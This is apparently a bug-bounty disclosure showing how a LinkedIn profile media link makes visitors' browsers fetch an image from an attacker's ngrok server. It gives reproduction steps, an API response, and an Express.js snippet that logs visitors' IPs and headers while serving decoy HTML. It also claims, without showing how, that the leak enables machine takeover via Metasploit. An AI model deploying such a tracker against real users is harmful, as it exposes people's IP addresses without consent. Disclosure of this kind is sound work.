The vulnerability lead to IP disclosure which can preform a harmful actions such as takeover user's machine by using Metasploit framework.
- Replace
{user-name}with your user name then go,https://www.linkedin.com/in/{user-name}/edit/topcard/.
- Go to media section, Then add a link.
When com.linkedin.voyager.feed.urlpreview.PreviewImage failed in getting preview images will used our link as a preview-image in case of this you should avoid any image url in meta-tags.
- Linkedin url preview endpoint
https://www.linkedin.com/voyager/api/feed/urlpreview/{URL}
When adding https://a738b3cb.ngrok.io/user, we got:
-
Response:
{ "data": { "$deletedFields": [], "value": { "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful" }, "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse", "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root" }, "included": [ { "$deletedFields": [], "data": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data", "$type": "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful", "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful" }, { "urn": "urn:li:article:7726755832606755082", "previewImages": [], "$deletedFields": [ "description", "update" ], "resolvedUrl": "https://a738b3cb.ngrok.io/user", "source": "a738b3cb.ngrok.io", "id": "urn:li:article:7726755832606755082", "type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse", "title": "The Rock", "url": "https://a738b3cb.ngrok.io/user", "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewData", "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data" } ] } -
If
previewImageskey on the response is an empty array,com.linkedin.voyager.feed.urlpreview.PreviewImagewill useresolvedUrlas a preview image. -
When a user visit the profile and click on See more, The preview image will be loaded in background directly.
-
I added a new header tag called
User-Message(yser-Message)to request header. -
I might get the header tag with it contents in logs.
We've got the flag
It's an express.js application written in Node.js.
| Author | By me |
|---|---|
| Written in | Node.js |
| Dependencies | {"express": "^4.15.3"} |
| Installion | npm install |
| Run | node start |
-
We need to check
acceptandrefererheader tag to detect if request was sent fromlinkedin.comor notapp.get('/user', function (req, res) { if (/image\/(.*)/.test(req.header('accept')) && /linkedin.com/.test(req.header('referer'))) { res.sendFile(ourImage); storeLogs(); } else { res.sendFile(ourHTMLpage); } ...
-
If
accept&referermatched, stream the image and store this request payload inlog.json -
Unless send a html page without any meta-tags that used for image
<html prefix="og: http://ogp.me/ns#"> <head> <title>The Rock (1996)</title> <meta property="og:title" content="The Rock" /> <meta property="og:type" content="video.movie" /> <meta property="og:url" content="http://www.imdb.com/title/tt0117500/" /> </head> <body> </body> </html>
The full script in attachment
Since the attacker’s profile is publicly accessible, This vulnerability could affect all users on the given domain because it is publicly visible if the attackers profile is viewed by any other user on the platform. Furthermore, this could be used to perform actions against the victim (or any user visiting that page) and could potentially lead to took over the user’s machine remotely. This could happen by users navigating to the attacker’s profile on their own, or by the attacker somehow persuading the victim to navigate to the profile.
Took over a user’s machine would allow an attacker to perform harmful actions. A great topic about how to target a public IP with metasploit. .
Watch the video on https://youtu.be/DNywwox2Lv8, Don't worry it's unlisted video